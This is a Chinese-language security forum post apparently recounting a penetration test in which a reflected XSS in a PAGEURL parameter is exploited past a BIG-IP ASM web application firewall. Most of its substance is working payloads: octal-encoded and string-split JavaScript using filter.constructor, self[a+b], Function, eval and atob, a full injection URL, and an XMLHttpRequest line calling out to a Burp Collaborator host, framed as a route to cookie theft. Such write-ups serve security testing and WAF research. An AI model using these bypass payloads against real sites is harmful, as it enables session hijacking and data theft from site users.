安全矩阵

 找回密码
 立即注册
搜索
查看: 1558|回复: 0

绕 waf 实战之 xss 漏洞利用

[复制链接]

145

主题

192

帖子

817

积分

高级会员

Rank: 4

积分
817
发表于 2022-7-6 16:25:07 | 显示全部楼层 |阅读模式
绕 waf 实战之 xss 漏洞利用
在一次测试中,遇到一个可以利用 XSS 的点,但是存在 BIG-IP ASM 防火墙,导致无法直接利用,在大神的帮助下完成了利用。随后经过自己的努力,也找到了一种绕过方式。
0x01 XSS 漏洞发现测试中发现一个接口,参数 PAGEURL 可控,且输入的内容会原样响应在返回包中,如图:
编辑
响应包如图:
编辑
测试常规 payload 被 WAF 拦截,如图:
编辑
响应包:
编辑
可以看到被 WAF 拦截。
0x02 WAF 绕过在这个点上测试了一天都没能绕过,在以为专注 WAF 绕过研究的大神帮助下,发现一个可用的 Payload,长下面的样子:
  1. []["\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162"]("
  2. \145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()
复制代码
老实说,长这个样子的 payload 我也是第一次见,解码后的内容是:
  1. []["filter"]["constructor"]("alert(1)")()
复制代码

接下来使用这个 payload 进行测试,如图
编辑
响应如图:
编辑
可以看到 payload 都已经出现在响应包里,但是是否可以执行呢?使用浏览器打开这个 URL:

  1. https://subdomain.redacted.com/...?PAGEURL=/something/";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="
复制代码
​编辑​​
发现代码已经执行了,说明 payload 有效。
漏洞利用当然,我们并不会满足于只是弹窗,接下来如何利用这个漏洞才是重点,首先基于 payload 的生成规则,编写了一个 Python 脚本,方便构造不同的 payload:
编辑
脚本使用方法,输入想要注入的 payload 即可:
编辑
XSS 通常用来盗取 cookie,接下来我尝试使用 XMLHttpRequest API 结合 burp 来进行漏洞利用的验证,将下面的 payload 进行转换:


  1. var req = new XMLHttpRequest(); req.open(“GET”, “https://s2v3f4nqrlg0kl5f2a0zggd37udl1a.burpcollaborator.net/xss",true); req.send(null);
复制代码


编辑
然后将 payload 与 url 进行组合然后请求,查看 burp 的访问记录:
编辑
说明 payload 执行成功。
自我突破,新姿势之前的 payload 是大佬给的,能不能自己实现一个绕过呢?看了一些 waf 绕过的资料后,发现以下 payload 可用:

  1. a=”al”;b=”ert”;self[a+b]();
复制代码

尝试是否可以绕过:
编辑
响应:
编辑
发现 waf 并没有拦截,尝试用浏览器打开页面,成功弹窗:
编辑
当然,利用 xss 不仅仅是弹窗,还是需要执行更复杂的功能,我们可以使用 Function 函数,构造的 payload 如下:

  1. a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();
复制代码

请求之后的返回结果:
编辑
浏览器访问之后执行 payload:
编辑
接下来想要执行更复杂的 payload,只需要修改 base64 编码部分即可,所以编写了如下脚本:
编辑
比如之前提到的利用 burp 验证:
编辑
提交之后返回结果如图:
编辑
浏览器访问之后,在 burp 得到如下结果:
编辑
值得注意的是,self[""] 被拦截,但是 self[a+b] 没有。
总结以上是这次针对存在 waf 的 xss 漏洞接口的绕过测试过程,通过一些 JavaScript 的特性,通过字符串变化、编码等方式组合 payload 从而实现 waf 的绕过,waf 通常是通过正则来进行检测和拦截,如果你找到了目标 waf 规则之外的方式,那么,恭喜你,waf 对你无用。




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 22:59 , Processed in 0.013829 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表